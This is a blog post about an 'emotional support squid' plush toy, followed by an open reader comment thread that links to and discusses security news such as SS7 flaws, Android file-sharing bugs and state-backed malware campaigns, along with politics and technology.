Friday Squid Blogging: Emotional Support Squid

When asked what makes this an “emotional support squid” and not just another stuffed animal, its creator says:

They’re emotional support squid because they’re large, and cuddly, but also cheerfully bright and derpy. They make great neck pillows (and you can fidget with the arms and tentacles) for travelling, and, on a more personal note, when my mum was sick in the hospital I gave her one and she said it brought her “great comfort” to have her squid tucked up beside her and not be a nuisance while she was sleeping.

As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.

Read my blog posting guidelines here.

Tags:

Posted on May 17, 2024 at 5:04 PM100 Comments

Comments

noname May 17, 2024 10:08 PM

Such cute emotional support squid!!

I like all the names, but personally, I would probably rename my squid Squidy

Could one make squid from anything better than: “upcycled fabric”, “love”, “but also A LOT of snark” (in any order of course) 😄

Feeling creepy deepy May 17, 2024 11:25 PM

@ALL

On the top left of the Etsy page there is a golden yellow square with googly eyes and a smaller odd golden thing behind it.

I’m left with a deep down creepy feeling It is a Bart Simpson hiding behind a SpongeBob SquarePants.

I guess it’s time to catch some nightmares 🙁

lurker May 17, 2024 11:40 PM

@JonKnowsNothing
do not reply, just a second world symbol from a country that likes to think of itself as first world.

A recent Federated Farmers survey highlighted that 52% of respondents still have a landline and 17% still rely on the copper network for their internet connection. [1]

At the privatisation of the telecomms side of the old Post Office, the wires and network hardware remained in the hands of a single entity, now known as Chorus. Maintenance costs are rising on the old parts, mostly in remote rural areas, and Chorus is keen to move users off copper by 2026 where there is an alternative available, and completely by 2033. The two favored alternatives are: wireless within cellphone tower range. or satellite, although who pays how much for satellite is an interesting question.

Mention in the article of Cyclone Gabrielle refers to the widespread failure of cell towers. Nobody mentions that cellphones had been chosen to replace the old Civil Defence HF Radio system, which always worked when needed. Its big problem was it was run by old men who knew what they were doing, with equipment from Dad’s Army, that youngsters wouldn’t dare touch or learn about. Now local Civil Defence organizations are rushing to fill Mr Musk’s pockets with subscriptions to Starlink.

[1] ‘https://www.farmersweekly.co.nz/technology/alarm-bells-in-rural-nz-as-landline-service-rings-off/

echo May 18, 2024 12:43 AM

https://www.youtube.com/watch?v=hhfGspOIg24
Turtle Tanks, “Cope Cages” & Modified Vehicles in Ukraine – Purpose, Evolution & Effectiveness

Or as Perun calls it “Emotional Support Armour” which makes this post strangely on topic. (Yes, I know. Don’t all shout at once.) He does have a turn of words doesn’t he? Oh Lord oh Mighty. I find tech and security and all that po-faced stuff a bit too serious for me. You have to squeeze a laugh in there otherwise you go potty.

https://www.youtube.com/watch?v=QVilpxowsUQ
The Most Misunderstood Philosopher in the World.

Judith Butler invented “gender as a technology” and for those following the discussion the whole topic is caught up in geopolitics and national security, and combating bad actors who include nation states and organisations with deep pockets and their disinformation campaigns, and combating domestic terrorism and threats against democracy.

Philosophy is a long standing casual hobby of mine, and gender studies is a new hobby horse which slots neatly into public policy so gives me something to do. This video is just a mainstream primer for those new to the topic.

https://www.youtube.com/watch?v=p5ANxvEhHqY
Channel Four News
The Political Fourcast
Are Labour and Tories already in election mode?

This video covers subjects which touch on governance and how “think tanks” (gloried lobby and marketing organisations) and dark money can influence public policy in harmful ways. I have a short comment planned which goes into the public policy issues including abuse of public office and the cost of not listening to experts which has knock on effects with child safety and policing.

I may have another comment also on bad governance, and border security, and profiteering which is caught up in this too. I don’t know if the post-Brexit import processing system which crashed this week and border checks will make the cut. It’s just yet one more thing on the pile with a heap of things.

https://www.youtube.com/watch?v=S3lZoxRVglg
Wogan
Fay Presto.

https://www.youtube.com/watch?v=N7JE-4hWhUo
Fay Presto The Legend Of Magic Speaks Out And Does Not Hold Back! | Talk Magic With Craig Petty #41

Magic doesn’t spring to mind very often when discussing security. It appeals to me because of the show element and slight of hand which are subsets of disguise and other sneakery. People don’t see they perceive and it’s not what you’re up to it’s what they don’t know you’re up to which appeals to me.

It’s been an embarrassing numbers of years since I was school age. I had so many interests back then. One of them was magic. I did my first magic performance maybe when I was 12-ish. It was a bit of a dud I’m ashamed to remember. When I was older I saw this interview on live broadcast television of the day and was completely amazed by Fay Presto. Something clicked on an emotional and personal level and the magic? Everything just went together.

The reason why I looked up and watched these videos is I’ve been taking up magic again. This time it’s focused on cards and perhaps other close-up slight of hand. It’s so simple on one level. I’ve been learning a couple of tricks this past week and they’re easy in principle but so very very hard in practice and to do it right every time without fail. It’s not perfectionism I’m chasing. It’s the fun and enjoyment and, wow, does it clear your brain of clutter.

Ooof. If there’s one thing I’ve learned this week it’s never trust a magicians hands. If they’re moving or not moving their hands are lying. Even a misdirection can be a misdirection.

Good mental health is foundational to everything whether it’s society or the more gimlet eyed security stuff so if you’re feeling stressed or grumpy watch some magic, or maybe learn a magic trick. It’s fun and costs next to nothing.

Feeling creepy deepy May 18, 2024 1:29 AM

Did the Earth Move for you or did Boris pull out?

So no need for the emotional safety blanket.

https://www.yahoo.com/news/russian-rocket-booster-not-military-164627080.html

Some may know what a NOTAM (Notice to airmen) is others not, but simply it’s a warning of what might be a ‘what goes up is coming down’ so don’t fly / go there, lest it ruin your day.

Russia issued a NOTAM for 10days (16th – 26th) for a largish area off of California also covering the air routes to/from Hawaii. And unsurprisingly stories buzzed onto the Internet that Russia was going to do a ballistic missile launch from a submarine or similar.

Then the story changed to “launch junk re-entry” from a rocket launch booster

Then it changed again as Boris withdrew his NOTAM.

Despite the getting all a Twitter such NOTAMs are kind of standard.

ResearcherZero May 18, 2024 3:55 AM

RAT used to target highly selective list of AI experts.

‘https://www.darkreading.com/cyberattacks-data-breaches/us-ai-experts-targeted-in-sugargh0st-rat-campaign

AI model exports will be hard to control.
https://www.reuters.com/technology/us-eyes-curbs-chinas-access-ai-software-behind-apps-like-chatgpt-2024-05-08/

‘https://www.trendmicro.com/en_us/research/24/e/earth-hundun-2.html

BlackTech previously modified firmware to backdoor routers within trusted networks.
https://arstechnica.com/security/2023/09/china-state-hackers-are-camping-out-in-cisco-routers-us-and-japan-warn/

‘https://africa.businessinsider.com/local/leaders/china-dethrones-usa-as-the-most-influential-global-power-in-africa-report/ttr57ys

China has used country-to-country infrastructure financing to it’s advantage.
https://www.voanews.com/a/east-asia-pacific_us-sidelined-chinese-influence-campaign-africa/6209783.html

Huawei has built about 50% of Africa’s 3G networks and 70% of its 4G networks.

‘https://www.voanews.com/a/economy-business_analysts-china-expanding-influence-africa-telecom-network-deals/6209516.html

China took a lead role in Africa’s telecommunication, finance, and surveillance sectors.
https://www.sentinelone.com/labs/cyber-soft-power-chinas-continental-takeover/

“Huawei’s cloud infrastructure and e-government services are handling sensitive data on citizens’ health, taxes, and legal records. These services also operate critical infrastructure, from oil production and fuel distribution in Brazil to power plant operations in Saudi Arabia.”

‘https://reconasia.csis.org/huawei-global-cloud-strategy/

Huawei is helping Malaysia and Russia build 5G networks, and 5G networks in Latin America.
https://www.cfr.org/backgrounder/chinas-huawei-threat-us-national-security

ResearcherZero May 18, 2024 4:09 AM

Improvements needed for the WiFi standard.

SSID Confusion

‘https://www.top10vpn.com/research/wifi-vulnerability-ssid/

echo May 18, 2024 4:11 AM

https://tech.slashdot.org/story/24/05/17/2119221/palantirs-first-ever-ai-warfare-conference
Some of the noteworthy quotes from the panel and convention, as highlighted in Haskins’ reporting, include:

“It’s always great when the CIA helps you out,” Schmidt joked when CIA deputy director David Cohen lent him his microphone when his didn’t work.

The U.S. has to “scare our adversaries to death” in war, said Karp. On university graduates protesting Israel’s war in Gaza, Karp described their views as a “pagan religion infecting our universities” and “an infection inside of our society.”

“The peace activists are war activists,” Karp insisted. “We are the peace activists.”

A huge aspect of war in a democracy, Karp went on to argue, is leaders successfully selling that war domestically. “If we lose the intellectual debate, you will not be able to deploy any armies in the west ever,” Karp said.

A man in nuclear weapons research jokingly referred to himself as “the new Oppenheimer.”

https://www.theguardian.com/technology/article/2024/may/17/ai-weapons-palantir-war-technology

On 7 and 8 May in Washington DC, the city’s biggest convention hall welcomed America’s military-industrial complex, its top technology companies and its most outspoken justifiers of war crimes. Of course, that’s not how they would describe it.

I think if you want lasting geopolitical and national security these are the last people you want to discuss anything with. They’re all off their trolley.

Outside, I talked to an ICRC employee, Thomas Glass. He was attentive and engaged, but he seemed tired. He said that he had just spent several weeks in southern Gaza setting up a field hospital and supporting communal kitchens.

I asked how people at the conference had been responding to his exhibit. Glass said that most people he met had been open-minded, but some asked why the ICRC was at the conference at all. They weren’t aggressive about it, he said. They just genuinely did not understand.

No they don’t and that’s the problem.

Feeling creepy deepy May 18, 2024 6:31 AM

@ALL Android Users

Some people say you should not use messaging and similar “security Apps” because of issues in the OS and drivers allowing the app security to be more easily bypassed.

Well Microsoft have found an issue in Android that provides such an issue to do with the mechanism that enables apps to supposedly share files more securely

“This gives attackers an opening to create a rogue app that can send a file with a malicious filename directly to a receiving app — or file share target — without the user’s knowledge or approval, Microsoft said. Typical file share targets include email clients, messaging apps, networking apps, browsers, and file editors. When a share target receives a malicious filename, it uses the filename to initialize the file and trigger a process that could end with the app getting compromised, Microsoft said.”

https://www.darkreading.com/cloud-security/billions-android-devices-open-dirty-stream-attack

It is a reminder about the supposed rider on the CIA motto of ‘In God We Trust’ that says

“And all others we verify”

You should loose the trust in deities and verify them all the time as well 😉

Erdem Memisyazici May 18, 2024 8:55 AM

A lot of people don’t realize that the derpy cute concept is quite alien to a large portion of the planet. Usually more something looks like a baby cuter it is (i.e. chibi) but then you look at the Western cultures and you have these pathetic looking malformed things people find adorable and you wonder what their nightmares might look like.

&ers May 18, 2024 9:17 AM

@ALL

Hungary’s foreign ministry hacking. In English.

hxxps://www.direkt36.hu/en/putyin-hekkerei-is-latjak-a-magyar-kulugy-titkait-az-orban-kormany-evek-ota-nem-birja-elharitani-oket/

Feeling creepy deepy May 18, 2024 10:53 AM

@Erdem Memisyazici

“…you have these pathetic looking malformed things people find adorable and you wonder what their nightmares might look like.”

You are not alone in that thought. As noted above

“I guess it’s time to catch some nightmares :-(“

phranq su0ru May 18, 2024 1:17 PM

“emotional support squid” and not just another stuffed animal

But who will squidly emotionally support the emotional support squids ? And who cries for the just another stuffed animals ?

lurker May 18, 2024 11:14 PM

@Feeling creepy deepy

Since when has Android Messaging been a “security App”?

Any residual trust I might have had in Android file sharing vanished when in Chrome to copy a page url you must “share” it to the clipboard.

ResearcherZero May 19, 2024 3:06 AM

Attackers were able to deploy a variety of newly added malware tools at a massive scale.

‘https://arstechnica.com/security/2024/05/ssh-backdoor-has-infected-400000-linux-servers-over-15-years-and-keeps-on-spreading/

Attackers have repeatedly tracked people in the U.S. via network flaws.

(paywalled)

‘https://www.404media.co/cyber-official-speaks-out-reveals-mobile-network-attacks-in-u-s/

The regulator wants to know the date(s) of the incident(s), what happened.

‘https://www.theregister.com/2024/04/02/fcc_ss7_security/

Attacks are concentrated on a subset of attack sources as well as on a subset of victims.
The main attacks are proportional along the time. Thousands of threats are triggered daily.

‘https://www.fcc.gov/file/13925/download

Filtering alone doesn’t resolve the problems or prevent eavesdropping along the wire.

“Each case has one thing in common: attacks begin with malicious action in one protocol that are continued in another, requiring specific combinations of actions and mixed-generation networks to succeed. Architecture flaws, misconfiguration, and software bugs exist that provide entryways for potential attacks.”

The flaws can also be used to reroute two-factor codes used to prevent fraud.
https://www.zdnet.com/article/5g-networks-could-be-vulnerable-to-exploit-due-to-mishmash-of-old-technologies

Attack Scenarios
https://spectrum.ieee.org/alarming-security-defects-in-ss7-the-global-cellular-networkand-how-to-fix-them

ResearcherZero May 19, 2024 3:14 AM

Wyden also raised some of the scenarios in his 2018 letter.

‘https://www.wyden.senate.gov/imo/media/doc/wyden-fcc-ss7-letter-may-2018.pdf

“A good engineer’s and a good mathematician’s aptitudes don’t always overlap.”

Great programming languages aren’t always great for programming.

‘https://www.wired.com/story/inside-the-cult-of-the-haskell-programmer/

Merging inputs.

‘https://www.wired.com/story/google-io-end-of-google-search/

A key aspect of selective attention, distractor suppression is essential for survival.
https://news.mit.edu/2019/how-brain-ignores-distractions-0612

“Our brains are really complicated, and it’s the coordination that’s hard.”

‘https://www.futurity.org/focus-intelligence-brains-3190652/

jelo 117 May 19, 2024 11:45 AM

@ ResearcherZero

“A good engineer’s and a good mathematician’s aptitudes don’t always overlap.”

Great programming languages aren’t always great for programming

Of course, they should have used Standard ML. 😉

Also, partially au contraire, a good mathematical education including category theory [1] is a help in programming.

  1. https://dl.acm.org/doi/book/10.5555/129094
  2. https://en.wikipedia.org/wiki/Categories_for_the_Working_Mathematician
  3. https://link.springer.com/book/10.1007/978-1-4612-0927-0

&ers May 19, 2024 4:08 PM

@ALL

Enjoyed Hungary’s MFA hacking?
More on that subject!

hxxps://www.welivesecurity.com/en/eset-research/moon-backdoors-lunar-landing-diplomatic-missions/

regular May 19, 2024 4:32 PM

Where is Clive?

Where is SpaceLifeForm?

I see only spamming newcomers.

And sadly this blog is turning from “Security” into “AI” 🙁

Let’s rename it to “Schneier on AI”

Probably need to leave too…

cybershow May 19, 2024 4:37 PM

@all

Not really about security as such (unless you consider sanity of the human race
as a kind of security). Anyway I hope you might enjoy this weeks Cybershow episode
on AI and Music .

All good wishes

Feeling creepy deepy May 19, 2024 4:56 PM

@ALL

A look in the archives shows one subject that comes up from time to time is the future of “War at Sea” and it appears quite controversial if not divisive amongst long term commenters in the past.

One side kind of suggest that “Carrier fleets” will have a future in Super-Power conflict… Rather than the opposing view of Carrier fleets just being used as well over priced flag wavers to put tax dollars in certain MIC pockets. Oh and maybe still have a role against third world nations that can not fight back being ‘bombed back to the stone ages’.

But the main point of contention appears to be pointing out that carrier groups had their 15mins of fame well back in the last century. Even that they were past it in the Pacific War. And denials about just how vulnerable carrier fleets are to a whole plethora of more modern weapon systems from space on down to the depths of the ocean.

The bottom of down is kind of how far underwater you can put a weapons system. Which currently could be between 1,000 and 5,000 meters.

Many think of maned submarines, which is a subject Perun has just released an interesting video on

https://m.youtube.com/watch?v=S96oRLoE0Zk

However he does not in general go beyond conventional submarines and their eyewateringly expensive costs.

The thing is as with 6th Gen fighter aircraft the future of underwater conflict is going to go to “unmanned” systems. Because for a whole host of reasons “squishy organics” place way to many constraints on what we can currently do. A look at deep see systems shows this up to the eye. Basically a very large and heavy pressure vessel is needed for the organics, but the mechanics and electrics can work quite well outside of it and are almost trivially small in comparison.

The obvious unmanned subsea platforms would be ‘bottom sitting’ ‘Drone mine’ and ‘Drone torpedo’ systems. They will be sufficiently inexpensive that the upper tier of nations transitioning into Super Powers in their own right could develop and deploy upwards of thousands of such devices and it looks like India and Brazil are currently doing so.

But also there is the question of ‘Subsea drone hypersonic missile platforms’ to think about. It’s a question that few want to consider even though we know the capability to make such systems is now way closer to a question of manufacturing plant construction rather than research.

Anyway the Perun video will make an interesting tech outliner on manned submarines for those with an hour free.

Corporate May 19, 2024 7:02 PM

This site has been a test-bed for AI long before OpenAI’s GPT (or their competitors) was a public thing

The democratization of AI has made “pseudospoofing” more accessible to everyone

Feeling creepy deepy May 19, 2024 7:45 PM

@vas pup

What does the harm to humans in road accidents is the inertial energy of your loose limbs and internal organs.

The inertial energy is proportional to the square of the velocity (speed for normal people 😉

If you increase the velocity by 10% the energy goes up by 21%. Increase the velocity 20% and the energy goes up by 44% or nearly double.

But the damage done to internal organs is actually nonlinear, due to support structures breaking. So the real harm is quite a bit more.

But you ask

“So, maybe consumer IT things should be designed for real people as well with more embedded safeguards . Agree?”

Humans are actually very bad with complex technology. One reason is the ‘five pluss or minus two’ issue of what people can hold in their current conscious cognitive memory.

The way humans deal with this is to get the load down on the conscious cognitive memory. We speak of ‘muscle memory’ for physical actions such as riding a bike or driving a car. Actually the muscles have no memory but at the top of our spine is part of the autonomous subconscious mind. That kind of is our ‘auto pilot’. It responds to recognised signals something like three to seven times faster than the conscious mind. It’s why we can catch a ball or hit a ball that has been pitched/bowled at us and traveled over a short distance at a speed that gives a time too short for our conscious mind to realistically react.

So… it’s not just ‘consumer IT things’ but all ‘IT things’ that should be designed in a way such that what we call ‘muscle memory’ can be built up.

Back in the early 1990’s there was a good deal of investigation into ‘user interfaces’ in what was called ‘Human Computer Interfacing'(HCI) many of the lessons that were starting to be learned in HCI research were lost when the push for all graphical interfaces driven grossly inefficiently by ‘mice’ and other very poorly designed input devices became vogue.

Contrary to what many people think learning ‘keyboard shortcuts’ significantly improves your ability to use technology and can more than double your efficiency in a matter of a few weeks.

But saying this is heresy and you and I would be lynched by certain entrenched interests if we were to say we should ditch the ‘Graphical User Interface'(GUI) and go back to the ‘Command Line Interface'(CLI) of old with dvorak keyboard.

Historical note :- The QWERTY keyboard was actually designed to slow ‘typewriters’ down. The mechanics of the devices were slow enough that a skilled typist could ‘beat the strike and drop’ so would have two letters in transit that would tangle.

I used to use a mechanical TTY last century that some will remember as the KSR. There were certain key sequences I had to remember to ‘slow down for’ for the same reason. Mad as it might sound but I could beat the supposed 300baud even though I was not a skilled typist. Because whilst the serial port electrical speed might have been 300baud the typehead mechanics were not much more than the equivalent of a 50baud 7 characters a second system.

noname May 19, 2024 8:22 PM

@vas pup, @Feeling creepy deepy, @All

re: road safety progress

Inspirational. VisionZero is a wonderful paradigm shift with such opportunity to protect life and health.

One of my high school teachers lost her husband in a road accident. He was driving along a long stretch of interstate to pick their daughter up from college.

It’s something that I am unable to forget. I don’t recall the timelines, but wire median has been setup along this stretch. I am so grateful.

I enjoyed reading the examples of safety measures and hope they are thoroughly studied and solidly forefront in the minds of public safety planners.

ResearcherZero May 20, 2024 4:08 AM

Banning political AI-generated deepfakes during the election season.

‘https://fortune.com/2024/05/16/senate-ai-regulation-spending-dominance-china/

Systems that track image provenance can then help reduce the volume.
https://thediplomat.com/2024/05/ai-and-elections-lessons-from-south-korea/

Fake news has the greatest affect against those aged 60 and above.
It is covertly generated and spread as part of negative strategies.

‘https://www.dw.com/en/south-korea-battling-deepfakes-ahead-of-key-election/a-68712855

The speed at which convincing fakes can be produced makes combating it a daunting task.
https://www.brennancenter.org/our-work/research-reports/regulating-ai-deepfakes-and-synthetic-media-political-arena

Hundreds of deepfakes targeting political candidates have already been discovered in 2024.

‘https://www.fenimoreharper.com/s/FENIMORE-HARPER-REPORT_-DEEP-FAKED-POLITICAL-ADS-V2.pdf

ResearcherZero May 20, 2024 4:23 AM

Once emotions are provoked, participation becomes tangible.
This is the first objective — that makes all others possible.

Monitoring diplomatic missions and political reactions allows the actor to adjust strategy.

‘https://www.lemonde.fr/en/pixels/article/2024/05/17/azerbaijan-s-interference-operations-in-new-caledonia-is-only-part-of-the-story_6671708_13.html

Russia and Azerbaijan had both been running operations in New Caledonia in advance.
https://www.smh.com.au/world/oceania/french-officials-see-foreign-interference-behind-deadly-riots-in-new-caledonia-reports-20240517-p5jedl.html

The “Bakou Initiative Group Against French Colonialism” was set up in July 2023, on the margins of a meeting of the non-aligned movement held at the time in the Azerbaijan capital.

‘https://asiapacificreport.nz/2024/04/26/controversial-azerbaijan-deal-sparks-fresh-row-in-new-caledonia/

Turla using stenography to hide commands.

The first backdoor uses HTTP(S) and mimics traffic of services like Windows Update. The second runs as an Outlook add-in on workstations, using PNG, PDF, or email to communicate.

‘https://www.welivesecurity.com/en/eset-research/moon-backdoors-lunar-landing-diplomatic-missions/

echo May 20, 2024 5:04 AM

https://www.tickettailor.com/events/europeanmovement/1262254

The fight for the ECHR: What is at stake?
Wed 29 May 2024 6:30 PM – 7:30 PM BST

Dominic Grieve KC PC
Jessica Simor KC
Andrew Cutting

Brexit is a calamity. It has damaged our economy, broken our politics, and made us weaker on the world stage.

Now, the people responsible for Brexit want to remove the UK from the European Court of Human Rights (ECHR), the international court set up in the aftermath of the Second World War to protect people from tyranny.

* You will have the chance to put your own questions to the panel.
* The event will also be streamed live on YouTube. This means that, if you can’t make it, You will also be available to watch on our YouTube channel the day after the event.
* You will receive the link to join the event once you have RSVP’d.

A constitutional overhaul of the UK is long overdue. Leaving the ECHR is not it. A constitutional convention leading to a written constitution, parliamentary reform, and voting reform makes much more sense. Ditto reform of media and regulators and kicking the dark money funded think tanks out.

https://www.youtube.com/watch?v=T-4CyftrOyk
Jahara ‘FRANKY’ Matisek – Why our Approach to Containing Russia is Wrong & Risks Failure in Ukraine.

https://www.youtube.com/watch?v=6S__TPKQZ74
Casey Michel – Is Putin Retooling His Regime to Support ‘Eternal Warfare’ & Confrontation with West?

I some some comment to make on governance and dark money interests and doctrine relating to geopolitics and human rights and social and military positions but between them these two videos this week say the key points I wanted to make.

A lot of ink is spilled on the threat from Russian disinformation and military escapades. While they are an issue I feel the main threat is internal. The past 50 years of neoliberalism and more lately right wings parties being hijacked by the far right is the biggest threat. Russia and other bad actors are simply opportunistically capitalising on this fault line.

US refusal to sign up to the human rights at a constitutional level and join the ICC perpetuates a lot of problems.

Feeling creepy deepy May 20, 2024 5:20 AM

@ResearcherZero
@ALL

When your tools slip and take a chunk out of you

“Turla using stenography to hide commands”

Whilst technically interesting as a covert ‘Command and Control Channel'(CCC) it’s the rest of it that is the issue. Because in effect it exploits a misconfigured enterprise-level network and application monitoring and control tool.

Whilst some have heard of the closed source ‘SolarWinds’ and what happened with it, considerably less people have heard of the open source near equivalent ‘Zabbix’.

An overview of similarities and differences can be seen

https://www.dnsstuff.com/compare/zabbix-vs-solarwinds-sam

Whilst Solarwinds got actually ‘backdoored” it appears that in this case Zabbix was incorrectly configured.

The problem with these tools is not that they are effectively agnostic to use, with ‘Good or Bad’ being a matter of the observers perspective.

The reason these types of tool are so attractive to attackers is the fact they are given very wide access at nearly all levels in an enterprise and as proxies have considerable reach and power.

Once such a tool is subverted by an attacker it can do almost anything the legitimate systems administrators can do, from the keyboard and often more.

Winter May 20, 2024 7:23 AM

@cybershow

What now for search?

as you write:

I recently wrote in the Times Higher Education on the demise of coherent and reproducible research methods in universities around the world.

Google creates search for advertising and is under constant attack by con-men and cheats to subvert the ranking of links.

Coherent and reproducible search results are not relevant for Google’s revenue and intervene with their advertising strategies. Also, voherent and reproducible search results are a target for SEO attacks.

To summarize, the only group who values coherent and reproducible search results are search users, and they are the product to be milked.

What now for search? The only large option is currently Being (and derivatives), which is a victim of the same pressure.

Federated, decentralized, search is a dream, but has horrendous security issues. Just imagine the combined SEO kartels battling it out on decentralized search.

Winter May 20, 2024 7:39 AM

@cybershow. (Continued)

What now for search?

Lists of alternatives

‘https://www.wired.com/story/best-google-search-engine-alternative-privacy/

‘https://www.pcmag.com/picks/go-beyond-google-best-alternative-search-engines

‘https://www.searchenginejournal.com/alternative-search-engines/271409/

‘https://kinsta.com/blog/alternative-search-engines/

‘https://ahrefs.com/blog/alternative-search-engines/

jelo 117 May 20, 2024 12:58 PM

Let a hundred flowers bloom, let a hundred schools of thought contend.

any agent provocateur

vas pup May 20, 2024 7:01 PM

@Feeling creepy deepy @noname

Thank you for input. That is kind of support of my point on IT devices
People want ‘dumbphones’. Will companies make them?
https://www.bbc.com/future/article/20240515-the-dumbphones-people-want-are-hard-to-find

“Self-labelled neo-Luddites and the tech-stressed are searching for phones with
fewer features. Industry experts cite precarious profit margins and a wobbly
market around this niche need.

The iPhone turns 17 this year. The launch of the touchscreen-controlled device
signaled a moment that has defined our expectations of smartphones ever since.

Almost an entire generation has grown up never knowing life without a smartphone. Enough time has passed that people have learnt about the good and bad of these devices in their lives, whether from myriad scientific studies, or simply their own experiences.

Many people are now acutely aware of the costs of having the world at their
fingertips. And they’re rejecting the ways these phones can sap concentration, impact sleep and exacerbate mental health concerns.

They’re transitioning to “dumbphones”, a catch-all term for phones with basic functions such as calling, texting and setting alarms. Some dumbphones resemble
90s flip phones. Others are niche, high-end products that provide a downgraded
smartphone experience at a surprising premium.

In some cases, concerned parents are turning to these devices as a way of
keeping their children away from the distractions of a smartphone. But the market also comprises seniors who want something simple; workers in tough
industries like construction or farming, who need rugged handsets; and everyday
users who can’t afford to pay the average price of a smartphone, often upwards of $500, and flagship smartphones can cost as much as $1,600. Abandoning these devices has also become its own trend: teenagers desperate to escape social media have set themselves up as neo-Luddites.

Getting off the smartphone wagon seemed perfect for me.

Yet doing so in practice was a bit harder than I expected. First, I had a hard time getting a dumbphone in my hand at all. There were few options and even fewer recommendations, a stark contrast to the millions of smartphone reviews across the internet. I finally found a website from writer and dumbphone advocate Jose Briones, who offers a “dumbphone finder”. I eventually chose a CAT-S22 flip phone, a semi-smart dumbphone, which has access to apps including Google Maps. It cost $69 and ends any call with a satisfying snap.

Getting off the smartphone wagon seemed perfect for me.

Yet doing so in practice was a bit harder than I expected. First, I had a hard time getting a dumbphone in my hand at all. There were few options and even fewer recommendations, a stark contrast to the millions of smartphone reviews across the internet. I finally found a website from writer and dumbphone advocate Jose Briones, who offers a “dumbphone finder”. I eventually chose a CAT-S22 flip phone, a semi-smart dumbphone, which has access to apps including Google Maps. It cost $69 and ends any call with a satisfying snap.

Despite demand from a rising trend, I came to understand phone manufacturers have little to no interest in offering these devices. With smartphones comprising the vast majority of all new phone sales, technology giants have little economic incentive to keep churning out new dumbphones or updating their existing line-ups.

According to Statista Market Insights, the total global feature phone market
is projected to bring in $10.6bn in revenue this year. Yet while phone
manufacturers do pull in notable sums from feature phone sales, they have struggled to turn a profit on the stripped-down hardware. And it’s largely not
economically worth it to try to improve the business, especially since phones are often only a small division of their overall companies.

Many of these tech giants generally generate revenue on either software or
highly specialized hardware for which consumers will pay hefty price tags. They
also have very diverse revenue streams. Samsung, for instance, earns billions each year from its semiconductor division. Simply, these companies have little
incentive to cater to dumbphone users, whose revenue potential is relatively
miniscule – that is, if they can even make the economics of manufacturing the devices work at all.

Briones, who quit smartphones in 2019, explains that bigger tech companies don’t want dumbphones to overtake their flashier, more expensive models. “The big tech giants don’t want anything that has to do with reducing your smartphone usage because they are not making money on the hardware of the device,” he says.

For instance, dumbphone users across the globe will be out of luck if the 2G and 3G networks that sustain their functionality disappear entirely. Plus, many jobs – even low-wage positions – require employees to carry phones with app capabilities. At the end of the day, there may not be enough customers to buoy even the savviest business model.

To be economically viable, argues Husson, companies could “develop a niche premium brand to reach these segments”. Indeed, some start-ups are trying to capture this specialty market and find economic success – offering a kind of modern take on the feature phone.

the strategy for US-based Ghost Mode. Rather than selling its own phone, the
company essentially reprograms a Google Pixel 6a smartphone to a customer’s
specifications, with all of the apps they need. Once they do, Ghost Mode locks the phone into those settings. Like most of these niche products, this service isn’t cheap at $600, but it may appeal to top-end consumers more than leaving their smartphones behind entirely.

Samsung Galaxy A32 – with a catch. I installed Minimalist Phone, an app that
gets rid of flashy app icons and backgrounds in favor of a stark black-and-
white interface. I kept Messenger, WhatsApp and Discord to stay in touch, but
nearly every other non-basic app went out the window. I don’t miss them.”

Less applications, less gates for security and privacy breaches and violation, less opportunity to access phone without court order for unauthorized surveillance.

Feeling creepy deepy May 20, 2024 8:09 PM

@vas pup
@noname

“People want ‘dumbphones’. Will companies make them?”

An observation and a question that both have the same answer,

Yes they do, and yes they do.

The problem is two fold.

Firstly the network service providers do not like dumbphones because such a phone user is going to have the cheapest plan, and won’t reveal very much about themselves by meta-data or location data so the hidden income for the network service provider is in effect denied.

But the second problem is that dumbphones don’t fit in with GPP “future plans”. As noted such phones are usually 2G and 3G technology and importantly the “radio spectrum” they use is wanted back by Governments to “re-sell” and “re-use” for the likes of 5G and 6G which are completely incompatible.

Though I suspect in many places 2G will carry on for years. The reason is 2G is built into “infrastructure” like transportation, signalling and control. Some systems like large construction equipment has a very high price tag and the expected long service life measured in a decade or more.

You might have heard there are a lot of unhappy farmers just recently. Apparently their very high end tractors stopped working due to loss of data communications. The manufacturers are saying “Act of God” as it’s due to the Sun creating geo-magnetic issues.

I say that as the Solar Cycle is approx 11years it was entirely predictable and the manufacturers should not have designed their systems to fail to a known issue.

ResearcherZero May 20, 2024 11:10 PM

Some other search providers do not have advertising and better results. If you want to use the original style google search, add the following URL as a search option to the browser.

{google:baseURL}/search?udm=14&q=%s

Further instructions can be found at the link below:

‘https://www.bleepingcomputer.com/news/google/frustration-grows-over-googles-ai-overviews-feature-how-to-disable/

Psalm 9:15-16

‘https://www.washingtonexaminer.com/news/justice/3004378/rudy-giuliani-hasnt-been-served-arizona-indictment-officials-cant-find-him/

Giuliani’s recent nightly live video streams alerted Arizona officials to his whereabouts.

https://eu.azcentral.com/story/news/politics/elections/2024/05/20/fake-electors-unredacted-indictment-released-by-arizona-attorney-generals-office/73771404007/

ResearcherZero May 20, 2024 11:22 PM

Hand-off procedures between attackers.

‘https://research.checkpoint.com/2024/bad-karma-no-justice-void-manticore-destructive-activities-in-israel/

APT34 offshoots have used DNS redirection during their operations.
https://blog.talosintelligence.com/dnspionage-campaign-targets-middle-east/

Targeting executives, HR staff, and IT personnel.

‘https://www.secureworks.com/blog/lyceum-takes-center-stage-in-middle-east-campaign

“common code structure and choices of variable names”
https://securelist.com/lyceum-group-reborn/104586/

NCSC recommends replacing SSLVPN and WebVPN with options employing open standards.

‘https://thecyberexpress.com/replacement-of-sslvpn-and-webvpn/

Other governments have recommended the change to more secure standards for some time.
https://www.ncsc.gov.uk/collection/device-security-guidance/infrastructure/virtual-private-networks

NSA and CISA also recommend IKE/IPsec

‘https://media.defense.gov/2021/Sep/28/2002863184/-1/-1/0/csi_selecting-hardening-remote-access-vpns-20210928.pdf

ResearcherZero May 21, 2024 12:10 AM

From memory, Psalm 9:15-16 states something along the lines of:

“Heathen, sinner, believer, show caution before zipping up your jeans.
Before committing to thy path, ensure first you dress in undergarment.”

He who forsakes the way of wisdom, the path of virtue, and thus becomes in proverbial language “a fool,” he shall remain… For the love of money is the root of all kinds of evil. By craving it, some have wandered away and pierced themselves with many sorrows.

This might be followed with the classic line:

“The honest man always yields to admit they have strayed from the righteous path.
If vanity protest the trap of one’s own fly. The sinner lets slip the terrible howl.”

lastoftheV8s May 21, 2024 12:35 AM

